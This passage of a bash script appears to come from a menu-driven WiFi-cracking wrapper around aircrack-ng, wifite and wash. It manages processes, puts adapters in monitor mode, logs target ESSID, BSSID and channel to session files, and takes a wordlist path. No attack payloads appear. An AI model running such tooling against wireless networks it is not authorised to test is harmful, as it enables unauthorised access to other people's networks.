NetworkManagerDispatcher #killall wpa_supplicant #killall avahi-daemon } restartProcesses(){ currentTask="restartProcesses" #killall NetworkManager NetworkManager #killall NetworkManagerDispatcher NetworkManagerDispatcher #wpa_supplicant #avahi-daemon } killWifite(){ currentTask="killWifite" findWifitePID=$(ps -A | grep "wifite" | head -c5) case "$findWifitePID" in "") # No Process Found ;; *) killWifiteTemp=$(kill $findWifitePID) ;; esac } killAirodump(){ currentTask="killAirodump" findAirodumpPID=$(ps -A | grep "airodump-ng" | head -c5) case "$findAirodumpPID" in "") # No Process Found ;; *) killAirodumpTemp=$(kill $findAirodumpPID) #killAirodumpTemp=$(killall airodump-ng) ;; esac } killAireplay(){ currentTask="killAireplay" findAireplayPID=$(ps -A | grep "aireplay-ng" | head -c5) case "$findAireplayPID" in "") # No Process Found ;; *) killAireplayTemp=$(kill $findAireplayPID) ;; esac } killAircrack(){ currentTask="killAircrack" findAircrackPID=$(ps -A | grep "aircrack-ng" | head -c5) case "$findAircrackPID" in "") # No Process Found ;; *) killAircrackTemp=$(kill $findAircrackPID) ;; esac } killWash(){ currentTask="killWash" findWashPID=$(ps -A | grep "wash" | head -c5) case "$findWashPID" in "") # No Process Found ;; *) killAircrackTemp=$(kill $findWashPID) ;; esac } killAll(){ killAirodump killAireplay killAircrack killWash killWifite } ############################################################################ # PROCESS MANAGEMENT END ############################################### ############################################################################ ############################################################################ # SESSIONS STUFF BEGIN ################################################# ############################################################################ cleanSessionFiles(){ currentTask="cleanSessionFiles" banner echo "" $red echo "*** THIS WILL ERASE ALL CURRENT SESSION FILES!!!" $white echo "" echo "" echo "If you would like to create a backup before doing this, press B and ENTER" echo "" echo "" echo "If you would like to CANCEL, press C and ENTER" echo "" echo "" echo "" echo "" $cyan echo "Automatically Continuing In 10 Seconds" $white echo "" echo "" read -t 10 eraseSessionConfirm case "$eraseSessionConfirm" in "") banner echo "" echo "Cleaning Session Files...." echo "" echo "" #rm "$capturePath/wep/wep.sessions" #rm "$capturePath/wps/wps.sessions" #rm "$capturePath/wpa/wpa.sessions" #rm "$capturePath/wpa2/wpa2.sessions" rm -r "$capturePath" sleep 1 mkdir "$capturePath" banner echo "" echo "Cleaning Session Files...." echo "" echo "" ;; "c" | "C") menuExtras ;; "b" | "B") backupFromSessionErase="1" backupSessionFiles ;; *) cleanSessionFiles ;; esac } backupSessionFiles(){ currentTask="backupSessionFiles" backupName="sessions-backup-$displayDate3" backupDir="sessions" #nextBackupSlot=0 if [ -f "$backupName.zip" ]; then nextBackupSlot=$((nextBackupSlot+1)) backupName="$backupName-$nextBackupSlot" fi #echo "$backupName" #echo "$nextBackupSlot" #read pause banner echo "" echo "Backing Up Session Files To:" echo "" $cyan echo "$backupName...." $white echo "" echo "" case "$backupFromCaptureErase" in "1") sessionCopyNewCaptureFiles banner echo "" sleep 2 zip -9 -r $backupName $backupDir sleep 1 cleanCaptureFiles backupFromCaptureErase="0" ;; esac case "$backupFromSessionErase" in "0") sleep 3 zip -9 -r $backupName $backupDir ;; "1") sleep 2 zip -9 -r $backupName $backupDir sleep 1 cleanSessionFiles backupFromSessionErase="0" ;; esac } sessionWriteBeginNew(){ currentTask="sessionWriteBeginNew" getCurrentDateAndTime echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "***** Begin New Session - $displayDateAndTime *****" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "Encryption: $encryptionTypeText" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "ESSID: $essid" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "BSSID: $bssid" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "Channel: $channel" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" } sessionWriteLoadPrevious(){ currentTask="sessionWriteLoadPrevious" getCurrentDateAndTime echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "***** Load Previous Session - $displayDateAndTime *****" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "Encryption: $encryptionTypeText" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "ESSID: $essid" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "BSSID: $bssid" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "Channel: $channel" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" } sessionWriteEndCurrent(){ currentTask="sessionWriteEndCurrent" getCurrentDateAndTime echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "***** End Current Session - $displayDateAndTime *****" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" } sessionRemoveEmpty(){ currentTask="sessionRemoveEmpty" #banner #echo "" #echo "Removing Empty Sessions...." #echo "" #echo "" rm "$capturePath/$encryptionType/empty.sessions" rmdir "$capturePath/empty" banner echo "" #echo "Removing Empty Sessions...." #echo "" #echo "" } sessionCreatePaths(){ getBSSIDCharOnly mkdir "$capturePath" mkdir "$capturePath/$encryptionType/" } sessionCopyNewCaptureFiles(){ cp *.cap "$capturePath/$encryptionType" cp *.ivs "$capturePath/$encryptionType" cp *.xor "$capturePath/$encryptionType" cp *.csv "$capturePath/$encryptionType" cp *.netxml "$capturePath/$encryptionType" } sessionSave(){ currentTask="sessionSave" getCurrentDateAndTime echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "***** Save Current Session - $displayDateAndTime *****" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "Encryption: $encryptionTypeText" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "ESSID: $essid" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "BSSID: $bssid" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "Channel: $channel" >> "$capturePath/$encryptionType/$encryptionType.sessions" echo "" >> "$capturePath/$encryptionType/$encryptionType.sessions" } sessionLoad(){ banner bannerStats currentTask="sessionLoad" while read line do echo -e "$line \n" done <"$capturePath/$encryptionType/$encryptionType.sessions" echo "" echo "" echo "" echo "Scroll up to see all loaded sessions." echo "" echo "" echo "" echo "Press ENTER to continue...." echo "" echo "" read pause } cleanCaptureFiles(){ currentTask="cleanCaptureFiles" banner echo "" $red echo "*** THIS WILL ERASE ALL CURRENT CAPTURE FILES!!!" $white echo "" echo "" echo "If you would like to create a backup before doing this, press B and ENTER" echo "" echo "" echo "If you would like to CANCEL, press C and ENTER" echo "" echo "" echo "" echo "" echo "Files will be copied to the \"/sessions/\" directory and backed up to a ZIP file" echo "" echo "" echo "" echo "" $cyan echo "Automatically Continuing In 10 Seconds..." $white echo "" echo "" read -t 10 eraseCaptureConfirm case "$eraseCaptureConfirm" in "") banner echo "" echo "Cleaning Capture Files...." echo "" echo "" sleep 3 rm *.cap rm *.ivs rm *.xor rm *.csv rm *.netxml ;; "c" | "C") menuExtras ;; "b" | "B") backupFromCaptureErase="1" backupSessionFiles ;; *) cleanCaptureFiles ;; esac } findCaptureFiles(){ currentTask="findCaptureFiles" listCap=$(ls | grep .cap) listIvs=$(ls | grep .ivs) listXor=$(ls | grep .xor) listCsv=$(ls | grep .csv) listNetXml=$(ls | grep .netxml) } ############################################################################ # SESSIONS STUFF END ################################################### ############################################################################ ############################################################################ # EMPTY VARIABLE CHECKS BEGIN ########################################## ############################################################################ checkForEmptyEncryptionType(){ currentTask="checkForEmptyEncryptionType" if [ "$encryptionType" == "empty" ];then banner bannerStats echo "" echo "There is currently no Encryption Type selected!" echo "" echo "" echo "Press ENTER to return to main menu...." echo "" echo "" read pause menuMain fi } checkForEmptyCredentials(){ currentTask="checkForEmptyCredentials" case "$1" in "bssid") if [ "$bssid" == "" ];then banner bannerStats echo "" echo "There is currently no BSSID saved in the previous session!" echo "" echo "" echo "Press ENTER to return to previous menu...." echo "" echo "" read pause $lastMenuID fi ;; "essid") if [ "$essid" == "" ];then banner bannerStats echo "" echo "There is currently no ESSID saved in the previous session!" echo "" echo "" echo "Press ENTER to return to previous menu...." echo "" echo "" read pause fi ;; "channel") if [ "$channel" == "" ];then banner bannerStats echo "" echo "There is currently no CHANNEL saved in the previous session!" echo "" echo "" echo "Press ENTER to return to previous menu...." echo "" echo "" read pause $lastMenuID fi ;; esac } ############################################################################ # EMPTY VARIABLE CHECKS END ############################################ ############################################################################ ############################################################################ # INTERFACE STUFF BEGIN ################################################ ############################################################################ checkInterfaceMode(){ currentTask="checkInterfaceMode" interfaceModeCheck=$(iwconfig | grep "$interfaceMonitor" | head -c 5) case "$interfaceModeCheck" in "") interfaceMode="0" #break; ;; *) interfaceMode="2" #break; ;; esac } checkMultipleAdapters(){ currentTask="checkMultipleAdapters" interfaceNumber="0" interfaceNumberMax="99" interfacesFound="0" while [ $interfaceNumber -le $interfaceNumberMax ] do banner $white echo "" echo "Checking WiFi Adapters...." echo "" echo "" interfaceCheck=$(iwconfig | grep "wlan$interfaceNumber" | head -c 5) interfaceMonitor="$interfaceCheck""mon" interfaceName=$interfaceMonitor case "$interfaceCheck" in "") interfaceNumber="99" interfaceNumberMax="99" break; ;; *) #interface="$interfaceCheck" interfaceNumber=$(($interfaceNumber+1)) interfacesFound=$(($interfacesFound+1)) ;; esac #echo "interfaceNumber: $interfaceNumber" #echo "interfaceNumberMax: $interfaceNumberMax" #echo "interfaceCheck: $interfaceCheck" #echo "interfacesFound: $interfacesFound" #read pause done } getWirelessInterfaceNames(){ currentTask="getWirelessInterfaceNames" #if [ ! -z "$showAdapterUsbAtherosAR9271" ]; then # showAdapterOneName="$showAdapterUsbAtherosAR9271" #fi } getWirelessInterfaces(){ currentTask="getWirelessInterfaces" # Check for the "refresh" flag and DO NOT display text if enabled # This is for the 2nd "getWirelessInterfaces" call for some forgotten reason :rolleyes: (Hides Text) case "$1" in # This is just splashing some text to wait out the 5 minute timeout....make it look useful!! "refresh") banner echo "" echo "Preparing $encryptionTypeText Attack...." echo "" ;; *) checkMultipleAdapters banner echo "" $cyan echo "To Change Adapter Settings, Press \"C\" Now" $white #echo "" #$cyan #echo "Current: $interface" $white echo "" echo "" echo "To Select Interface From Discovered, Choose From Below" echo "" $green # If no adpaters found if [ $interfacesFound -eq "0" ]; then $red echo "NO WIFI ADAPTER FOUND!!!" $cyan fi # If only one device detected if [ $interfacesFound -eq "1" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" fi if [ $interfacesFound -eq "2" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" fi if [ $interfacesFound -eq "3" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" echo "3) wlan2 ($showAdapterThreeName)" fi if [ $interfacesFound -eq "4" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" echo "3) wlan2 ($showAdapterThreeName)" echo "4) wlan3 ($showAdapterFourName)" fi if [ $interfacesFound -eq "5" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" echo "3) wlan2 ($showAdapterThreeName)" echo "4) wlan3 ($showAdapterFourName)" echo "5) wlan4 ($showAdapterFiveName)" fi if [ $interfacesFound -eq "6" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" echo "3) wlan2 ($showAdapterThreeName)" echo "4) wlan3 ($showAdapterFourName)" echo "5) wlan4 ($showAdapterFiveName)" echo "6) wlan5 ($showAdapterSixName)" fi if [ $interfacesFound -eq "7" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" echo "3) wlan2 ($showAdapterThreeName)" echo "4) wlan3 ($showAdapterFourName)" echo "5) wlan4 ($showAdapterFiveName)" echo "6) wlan5 ($showAdapterSixName)" echo "7) wlan6 ($showAdapterSevenName)" fi if [ $interfacesFound -eq "8" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" echo "3) wlan2 ($showAdapterThreeName)" echo "4) wlan3 ($showAdapterFourName)" echo "5) wlan4 ($showAdapterFiveName)" echo "6) wlan5 ($showAdapterSixName)" echo "7) wlan6 ($showAdapterSevenName)" echo "8) wlan7 ($showAdapterEightName)" fi if [ $interfacesFound -eq "9" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" echo "3) wlan2 ($showAdapterThreeName)" echo "4) wlan3 ($showAdapterFourName)" echo "5) wlan4 ($showAdapterFiveName)" echo "6) wlan5 ($showAdapterSixName)" echo "7) wlan6 ($showAdapterSevenName)" echo "8) wlan7 ($showAdapterEightName)" echo "9) wlan8 ($showAdapterNineName)" fi if [ $interfacesFound -eq "10" ]; then getWirelessInterfaceNames echo "1) wlan0 ($showAdapterOneName)" echo "2) wlan1 ($showAdapterTwoName)" echo "3) wlan2 ($showAdapterThreeName)" echo "4) wlan3 ($showAdapterFourName)" echo "5) wlan4 ($showAdapterFiveName)" echo "6) wlan5 ($showAdapterSixName)" echo "7) wlan6 ($showAdapterSevenName)" echo "8) wlan7 ($showAdapterEightName)" echo "9) wlan8 ($showAdapterNineName)" echo "10) wlan9 ($showAdapterTenName)" fi $white echo "" echo "" echo "" echo "TO USE DEFAULTS, JUST PRESS ENTER!" echo "" echo "" echo "Continuing In 10 Seconds...." echo "" echo "" ;; esac read -t 10 manualInterface hotkeyInput="$manualInterface" loadMenuHotkeys "$hotkeyInput" case "$manualInterface" in "") case "$isKaliTwo" in "0") interface=$(iwconfig | grep "wlan" | head -c 5) #interfaceMonitor=$(iwconfig | grep "mon" | head -c 4) interfaceMonitor="$interface""mon" interfaceName=$interfaceMonitor ;; "1") interface=$(iwconfig | grep "wlan" | head -c 5) #interfaceMonitor=$(iwconfig | grep "wlan" | head -c 8) interfaceMonitor="$interface""mon" interfaceName=$interfaceMonitor #fixKaliTwoMonError ;; esac ;; "1") interface="wlan0" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "2") interface="wlan1" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "3") interface="wlan2" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "4") interface="wlan3" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "5") interface="wlan4" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "6") interface="wlan5" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "7") interface="wlan6" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "8") interface="wlan7" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "9") interface="wlan8" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "10") interface="wlan9" interfaceMonitor="$interface""mon" interfaceName="$interfaceMonitor" ;; "C" | "c") banner echo "" echo "Enter Managed Mode Interface Name and press ENTER:" echo "" echo "" echo "" echo "Example: wlan0" echo "" echo "" echo "" $cyan echo "If Nothing Is Entered, Then Default Values Are Used" $white echo "" echo "" read manualSelectionManaged case "$manualSelectionManaged" in "") interface=$(iwconfig | grep "wlan" | head -c 5) manualSelectionManaged="$interface" ;; *) interface="$manualSelectionManaged" interfaceName="$interface$manualSelectionManaged" ;; esac banner echo "" echo "Enter Monitor Mode Interface Name and press ENTER:" echo "" echo "" echo "" echo "Example: $manualSelectionManaged""mon" echo "" echo "" echo "" $cyan echo "If Nothing Is Entered, Then Default Values Are Used" $white echo "" echo "" read manualSelectionMonitor case "$manualSelectionMonitor" in "") interfaceMonitor="$interface""mon" ;; *) interfaceMonitor="$manualSelectionMonitor""mon" interfaceName="$manualSelectionMonitor""mon" ;; esac ;; "W" | "w") #returnTo="getWirelessInterfaces" #spoofMacAddress getWirelessInterfaces ;; *) getWirelessInterfaces ;; esac #echo "$interface" #echo "$interfaceMonitor" #read pause } disableChannelHopping(){ sleep 1 ifconfig $interface down } enableChannelHopping(){ sleep 1 ifconfig $interface up } interfaceUp(){ #ifconfig $interface up ifconfig $interfaceMonitor up } interfaceDown(){ #ifconfig $interface down ifconfig $interfaceMonitor down } interfaceManaged(){ #iwconfig wlan0mon mode managed iwconfig $interfaceMonitor mode managed } interfaceMonitor(){ #iwconfig wlan0mon mode monitor iwconfig $interfaceMonitor mode monitor } fixKaliTwoMonError(){ currentTask="fixKaliTwoMonError" case "$isDebugMode" in "1") echo "DEBUG: Kali 2.x Fix - Step 1" echo "" echo "$interface" echo "$interfaceMonitor" read pause ;; esac ifconfig $interfaceMonitor down sleep 2 iwconfig $interfaceMonitor mode monitor sleep 2 ifconfig $interfaceMonitor up case "$isDebugMode" in "1") echo "DEBUG: Kali 2.x Fix - Step 2" echo "" echo "$interface" echo "$interfaceMonitor" read pause ;; esac } ############################################################################ # INTERFACE STUFF END ################################################## ############################################################################ ############################################################################ # MISC STUFF BEGIN ##################################################### ############################################################################ # Reset Session Values Back To Default setDefaultSession(){ currentTask="setDefaultSession" sessionID="0" capturePath=$(echo "$PWD/sessions") capturePathWEP=$(echo "$PWD/sessions/wep") capturePathWPS=$(echo "$PWD/sessions/wps") capturePathWPA=$(echo "$PWD/sessions/wpa") capturePathWPA2=$(echo "$PWD/sessions/wpa2") } getCustomList(){ banner bannerStats currentTask="getCustomList" echo "" echo "Enter the path to the list and press ENTER:" echo "" echo "" echo "Example: /pentest/wordlists/dictionary1.txt" echo "" echo "" read tmpCustomList case "$tmpCustomList" in "") getCustomList ;; *) wordlist="$tmpCustomList" ;; esac } getBSSIDCharOnly(){ currentTask="getBSSIDCharOnly" if [ "$bssid" != "" ];then bssidCharOnly=$(echo $bssid | sed 's/[\:]//g') fi } getCurrentDate(){ displayDate=$(date +"%D") displayDate2=$(date +"%Y-%m-%d") displayDate3=$(date +"%Y%m%d") } getCurrentTime(){ displayTime=$(date +"%T") } getCurrentDateAndTime(){ displayDateAndTime=$(date +"%D - %T") displayDateAndTime2=$(date +"%Y%m%d / %T") displayDateAndTime3=$(date +"%Y-%m-%d / %T") } fixNegativeOneChannelError(){ airmon-ng check kill } startNetworkManager(){ NetworkManager } killNetworkManager(){ currentPID=$(ps -A | grep NetworkManager | cut -c 1-5) killTask=$(kill $currentPID) #echo "$currentPID" #echo "$killTask" #read pause } wpaSupplicantKill(){ currentTask="wpaSupplicantKill" #currentPID=$(ps -A | grep wpa_supplicant | cut -c 1-5) #killTask=$(kill $currentPID) killall wpa_supplicant #echo "$currentPID" #echo "$killTask" #read pause } wpaSupplicantEnable(){ currentTask="wpaSupplicantEnable" systemctl enable wpa_supplicant } wpaSupplicantDisable(){ currentTask="wpaSupplicantDisable" systemctl disable wpa_supplicant } # This will output all variables and values currently in use, and is for debugging purposes only dumpEnvironment(){ currentTask="dumpEnvironment" } readXML(){ local ifsType="$1" local ifsCustom="$2" currentTask="readXML" case "$ifsType" in "") local IFS=\> ; read -d \< E C ; ;; "essid") local IFS=\> ; read -d \< E C ; ;; "bssid") local IFS=\> ; read -d \< E C ; ;; "channel") local IFS=\> ; read -d \< E C ; ;; # Takes 2 parameters "custom") local IFS=$ifsCustom ; read -d $ifsCustom E C ; ;; esac } openScanTargetsAsText(){ while readXML "essid" ""; do if [[ $E = " cloaked=\"false\"" ]]; then echo $C fi done < "$defaultScanOutputXML" >> "$defaultScanOutputTXT" while readXML "bssid" ""; do if [[ $E = BSSID ]]; then echo $C fi done < "$defaultScanOutputXML" >> "$defaultScanOutputTXT" while readXML "channel" ""; do if [[ $E = channel ]]; then echo $C fi done < "$defaultScanOutputXML" >> "$defaultScanOutputTXT" $terminal gedit "$defaultScanOutputTXT" } cleanTempScanResultsFile(){ flag="$1" case "$flag" in "all") rm "$defaultScanOutputIVS" rm "$defaultScanOutputXML" rm "$defaultScanOutputTXT" ;; "ivs") rm "$defaultScanOutputIVS" ;; "xml") rm "$defaultScanOutputXML" ;; "txt") rm "$defaultScanOutputTXT" ;; esac } ############################################################################ # MISC STUFF END ####################################################### ############################################################################ ############################################################################ # INITIAL LAUNCH BEGIN ################################################# ############################################################################ initMain ############################################################################ # INITIAL LAUNCH END ################################################### ############################################################################